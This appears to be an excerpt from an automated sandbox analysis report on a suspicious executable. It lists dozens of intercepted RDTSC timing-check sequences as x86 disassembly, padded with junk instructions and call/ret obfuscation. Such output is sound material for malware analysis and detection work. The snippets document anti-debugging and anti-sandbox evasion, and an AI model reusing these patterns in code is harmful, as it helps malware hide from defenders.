                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF891 second address: 10AF8AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jno 00007FFAC0BDB466h 0x0000000b jmp 00007FFAC0BDB46Fh 0x00000010 pop edi 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B1F22 second address: 10B1F81 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFAC1684458h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f jmp 00007FFAC1684465h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007FFAC1684458h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 mov dword ptr [ebp+122D2AE9h], edx 0x00000036 call 00007FFAC1684459h 0x0000003b jng 00007FFAC1684471h 0x00000041 push eax 0x00000042 push edx 0x00000043 jbe 00007FFAC1684456h 0x00000049 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B1F81 second address: 10B1FAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB46Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FFAC0BDB46Bh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jc 00007FFAC0BDB474h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B1FAD second address: 10B1FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FFAC1684456h 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B1FC0 second address: 10B205A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFAC0BDB468h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jno 00007FFAC0BDB474h 0x00000014 pop eax 0x00000015 call 00007FFAC0BDB46Eh 0x0000001a cmc 0x0000001b pop esi 0x0000001c push 00000003h 0x0000001e adc cx, 1F45h 0x00000023 push 00000000h 0x00000025 push eax 0x00000026 and edi, dword ptr [ebp+122D2E71h] 0x0000002c pop ecx 0x0000002d push 00000003h 0x0000002f mov ecx, 4A69695Ch 0x00000034 push B24A687Fh 0x00000039 jmp 00007FFAC0BDB470h 0x0000003e add dword ptr [esp], 0DB59781h 0x00000045 jg 00007FFAC0BDB46Ch 0x0000004b mov esi, dword ptr [ebp+122D2F65h] 0x00000051 add dword ptr [ebp+122D3B94h], ecx 0x00000057 lea ebx, dword ptr [ebp+12456DD4h] 0x0000005d jmp 00007FFAC0BDB46Ch 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007FFAC0BDB46Ah 0x0000006a rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B2171 second address: 10B2175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B2175 second address: 10B2196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FFAC0BDB46Dh 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D407C second address: 10D4087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FFAC1684456h 0x0000000a pop esi 0x0000000b rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D4087 second address: 10D408C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D408C second address: 10D40A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 jmp 00007FFAC1684462h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D26E9 second address: 10D26F0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2958 second address: 10D2964 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFAC1684456h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2964 second address: 10D2977 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop esi 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jp 00007FFAC0BDB466h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2977 second address: 10D2983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2983 second address: 10D298D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FFAC0BDB466h 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2ADB second address: 10D2AE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2AE1 second address: 10D2AE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2AE7 second address: 10D2AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FFAC1684456h 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2AF1 second address: 10D2B01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FFAC0BDB466h 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2DCD second address: 10D2DD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2DD7 second address: 10D2DDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2F5C second address: 10D2F7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAC168445Dh 0x00000009 jmp 00007FFAC168445Eh 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2F7B second address: 10D2F96 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FFAC0BDB472h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D30DF second address: 10D30E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C84EC second address: 10C8514 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FFAC0BDB479h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007FFAC0BDB466h 0x00000014 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D37FD second address: 10D3801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D3801 second address: 10D3807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D3807 second address: 10D3837 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAC1684462h 0x00000008 jmp 00007FFAC1684464h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D3C66 second address: 10D3C7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 js 00007FFAC0BDB46Ah 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D3C7B second address: 10D3C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D94C2 second address: 10D94C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D94C8 second address: 10D94CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D94CD second address: 10D94E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB46Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FFAC0BDB48Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F492 second address: 109F496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F496 second address: 109F4A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F4A2 second address: 109F4A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F4A6 second address: 109F4BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB470h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DE667 second address: 10DE66B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DE8EE second address: 10DE900 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFAC0BDB466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007FFAC0BDB46Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DE900 second address: 10DE90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DE90C second address: 10DE934 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB473h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007FFAC0BDB46Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E02B9 second address: 10E02BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E02BD second address: 10E02C7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E02C7 second address: 10E02EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC1684468h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jnp 00007FFAC168446Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E02EF second address: 10E032A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB46Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FFAC0BDB470h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FFAC0BDB471h 0x0000001b rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E07AB second address: 10E07B1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E0A4B second address: 10E0A51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E103B second address: 10E1042 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E11AC second address: 10E11B1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E190B second address: 10E1911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E3562 second address: 10E3568 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E2CA5 second address: 10E2CA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E2CA9 second address: 10E2CAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E2CAF second address: 10E2CC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FFAC168445Ch 0x00000013 jp 00007FFAC1684456h 0x00000019 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E4053 second address: 10E4057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E40EA second address: 10E40F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E40F3 second address: 10E40F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E559A second address: 10E559E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E6007 second address: 10E6025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAC0BDB479h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E6025 second address: 10E606C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+12451E36h], ebx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007FFAC1684458h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c jg 00007FFAC168445Ch 0x00000032 push 00000000h 0x00000034 movzx edi, cx 0x00000037 xchg eax, ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a push ecx 0x0000003b push ecx 0x0000003c pop ecx 0x0000003d pop ecx 0x0000003e rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E5DD7 second address: 10E5DDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E606C second address: 10E6087 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFAC168445Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e je 00007FFAC1684456h 0x00000014 pop esi 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E6087 second address: 10E6092 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FFAC0BDB466h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109D98F second address: 109D99C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFAC1684456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8174 second address: 10E817A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10989B7 second address: 10989D0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FFAC1684456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FFAC168445Ah 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10989D0 second address: 10989D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10989D6 second address: 10989DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EDCDB second address: 10EDCEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a jns 00007FFAC0BDB466h 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EFD37 second address: 10EFD46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC168445Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EEED4 second address: 10EEED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EFD46 second address: 10EFD4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EEED9 second address: 10EEEDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EFD4C second address: 10EFD50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EEEDE second address: 10EEEE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EFD50 second address: 10EFDC5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007FFAC1684458h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 mov ebx, dword ptr [ebp+122D2B1Eh] 0x00000029 push 00000000h 0x0000002b pushad 0x0000002c call 00007FFAC168445Dh 0x00000031 pushad 0x00000032 popad 0x00000033 pop esi 0x00000034 popad 0x00000035 push 00000000h 0x00000037 je 00007FFAC1684462h 0x0000003d jnp 00007FFAC168445Ch 0x00000043 xchg eax, esi 0x00000044 jmp 00007FFAC1684466h 0x00000049 push eax 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EFDC5 second address: 10EFDC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EEFC1 second address: 10EEFD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC168445Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EEFD4 second address: 10EEFEB instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFAC0BDB468h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007FFAC0BDB466h 0x00000017 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EEFEB second address: 10EEFF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EFF8E second address: 10EFF93 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0E5F second address: 10F0E65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0F4D second address: 10F0F51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F1ED2 second address: 10F1ED7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F2DE0 second address: 10F2E1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAC0BDB477h 0x00000008 jmp 00007FFAC0BDB471h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FFAC0BDB46Ch 0x00000019 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F3EC1 second address: 10F3EC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F3EC5 second address: 10F3ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F40ED second address: 10F40F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4ED4 second address: 10F4ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F5C57 second address: 10F5C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F5C5B second address: 10F5C72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB473h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
